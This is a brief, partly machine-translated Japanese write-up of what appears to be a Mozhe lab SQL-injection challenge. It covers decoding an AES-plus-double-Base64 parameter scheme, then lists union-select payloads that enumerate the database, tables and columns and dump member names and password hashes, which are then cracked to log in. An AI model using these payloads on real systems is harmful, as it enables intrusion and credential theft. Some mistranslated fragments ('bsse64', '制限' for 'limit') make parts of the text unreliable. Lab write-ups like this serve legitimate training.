ID発見後の復号化データ
復号化を試みましたが、復号化できません。複数の暗号化方式またはソルトが組み合わされている可能性があります。
7Kbscan スキャン Web ディレクトリ
list.zip には暗号化されたファイルが含まれています
関数が何をするのかを理解し、
暗号化原理: 平文 --> AES 暗号化 --> bsse64 暗号化 --> Base64 暗号化 --> 暗号文
ZUlJOGMzSmVMMHQwZHhNN3diM056Zz09 を復号化します
ビルドペイロードメソッド
以下のステートメントはすべて上記に従って暗号化されます
エコーを確認します: -1 Union select 1,2,3,4_mozhe
爆库:-1 Union select 1,database(),version(),4_mozhe
爆表:-1 Union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup' 制限 0,1_mozhe
爆列名:-1 Union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member' limit 0,1_mozhe
爆数据:-1 Union select 1,group_concat(name,password),3,4 from mozhe_Discuz_StormGroup.StormGroup_member 制限 0,1_mozhe
ストレージパスワード: 形式的には、通常は md5 暗号化です。
2 つのアカウントがログインしようとしています
一番下に鍵があります
